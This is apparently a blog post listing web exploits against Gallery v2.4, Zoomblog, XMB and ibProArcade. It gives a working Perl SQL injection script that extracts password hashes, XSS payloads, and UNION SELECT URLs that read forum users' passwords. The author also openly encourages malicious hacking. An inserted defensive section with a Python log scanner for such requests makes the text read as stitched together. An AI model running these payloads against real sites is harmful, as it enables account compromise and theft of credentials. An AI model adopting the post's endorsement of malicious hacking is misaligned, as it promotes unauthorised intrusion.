Hacking Gallery v2.4, Zoomblog, XMB and ibProArcade





For giggles, I am including all of the SQL/HTML injection exploits that have been discovered in the past day or two.

Gallery v2.4 SQL Injection

#!/bin/env perl
use LWP::Simple;

# Two arguments are required: the gallery base URL and a numeric user id.
if(!$ARGV[0] or !$ARGV[1]) {
print "\n== Warning ABDUCTER Behind U ==";
print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
exit(0);
}

$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,nick,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*";
# Fetch the page; the original was missing the "or" before die, so it did not compile.
$page = get($ARGV[0].$url) or die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

Zoomblog HTML Injection

NOTE: according to RBA, this injection bug was fixed even before the issue was reported.

HISTORIC: Zoomblog is prone to HTML injection attacks. A malicious Zoomblog user can inject hostile HTML and script code into the commentary via form fields, and that code is then rendered in the browser of any web user who views the commentary. Zoomblog does not adequately filter HTML tags from various fields, which allows an attacker to inject arbitrary script code into pages generated by Zoomblog.

All versions are vulnerable.

EXPLOIT #1:
Write <script>alert('test')</script> in http://blog.zoomblog/comments/


EXPLOIT #2:
<img src='javascript:void(0);' alt='' height=888888 width=888885 border=0>

For a how-to on Javascript Injection, visit Javascript Injection in this blog.

Cross Site Scripting HTML Injection in XMB


This is XSS in the old versions and HTML injection in the new versions of XMB forums.

Vulnerable file: u2u.php

Example is:
u2u.php?action=send&username=Html Injection OR XSS



SQL injection in ibProArcade.
It was tested and found to work under both vBulletin and Invision Power Board.
Date: 2005-11-5

The injection is here:
module=report&user=[userid]
Query: 'SELECT name FROM ibf_members WHERE id=[userid]'

Exploit IPB:
index.php?act=Arcade&module=report&user=-1 union select password from ibf_members where id=[any_user]

Exploit for vBulletin forums:
index.php?act=ibProArcade&module=report&user=-1 union select password from user where userid=[any_user]
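From the defender's side, the Gallery galid= and ibProArcade user= requests above leave a recognisable shape in a web server's access log. The following is an added example, not code from the original post or from any of the projects named in it: a small Python scanner that walks constructed Apache-style log lines (spaces in the request URIs encoded as %20 or +, as a real log would store them), decodes each query parameter, and flags UNION SELECT payloads as well as any non-numeric value in the two id parameters (the assumption that galid and user are integer ids comes from the queries quoted in the post).

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache-style access log lines (not real traffic). The URIs mirror the
# galid= and user= request shapes from the post, with spaces encoded as %20 or +.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Nov/2005:10:12:01 +0000] "GET /gallery/showGallery.php?galid=7 HTTP/1.1" 200 5120
203.0.113.9 - - [05/Nov/2005:10:12:07 +0000] "GET /gallery/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,passw,nick%20FROM%20users%20WHERE%20id=1/* HTTP/1.1" 200 4870
198.51.100.2 - - [05/Nov/2005:10:13:44 +0000] "GET /forum/index.php?act=Arcade&module=report&user=-1+union+select+password+from+ibf_members+where+id=1 HTTP/1.1" 200 2210
198.51.100.7 - - [05/Nov/2005:10:14:02 +0000] "GET /forum/index.php?act=Arcade&module=report&user=42 HTTP/1.1" 200 2190
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# UNION ... SELECT with whitespace or inline /* */ comments between the keywords.
UNION_RE = re.compile(r'\bunion\b(?:\s|/\*.*?\*/)+(?:all\s+)?select\b', re.IGNORECASE | re.DOTALL)
# Both applications use these as integer ids (assumed from the queries quoted in the post).
NUMERIC_PARAMS = {"galid", "user"}

def fully_decode(value):
    """Undo URL encoding until stable so double-encoded payloads become visible."""
    for _ in range(3):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_params(uri):
    """Return [(name, decoded_value, reason)] for query parameters that look injected."""
    findings = []
    for name, raw in parse_qsl(urlsplit(uri).query, keep_blank_values=True):
        value = fully_decode(raw)
        if UNION_RE.search(value):
            findings.append((name, value, "union-select"))
        elif name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value.strip()):
            findings.append((name, value, "non-numeric-id"))
    return findings

def scan_log(text):
    """Parse access-log lines and return (client_ip, uri, findings) for each flagged request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = flag_params(m["uri"])
        if findings:
            alerts.append((m["ip"], m["uri"], findings))
    return alerts
```

Running scan_log(SAMPLE_LOG) flags only the two injected requests; the non-numeric-id check also catches payloads that avoid the UNION keyword entirely, which is why the application-side fix (casting the id to an integer or binding it as a prepared-statement parameter) matters more than any log rule.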

And there you have it. All of the SQL/HTML/JAVASCRIPT injections found today.


If the human body was never exposed to ailments, it would be impressively vulnerable to the slightest cold. If our country was never exposed to hacking, it would be oppressively vulnerable to cyber terrorism. Without the creation of malicious hacking, Afghanistan could have destroyed America's economy with a ping flood. This is why I encourage malicious hacking, as an ethical practice. Without strengthening our defenses, we are weak. This site is focused on security through knowledge. I detest the fact that so many companies are being exploited because malicious hackers know their security holes before they do. For that reason, I hope to educate where the exploits lie. This isn't a 100% information base, as I only publish things I have been able to implement on myself. No credit is needed anywhere. However, if you are a publisher, I would appreciate credit. I am an advocate of open source, so copy and paste and call it your own if you like. If my work is good enough for you to plagiarize then that is my biggest compliment. If my work is good enough, I will be approached and asked to write more ... this is natural selection of the digital age.


These are sites I block at my firewall.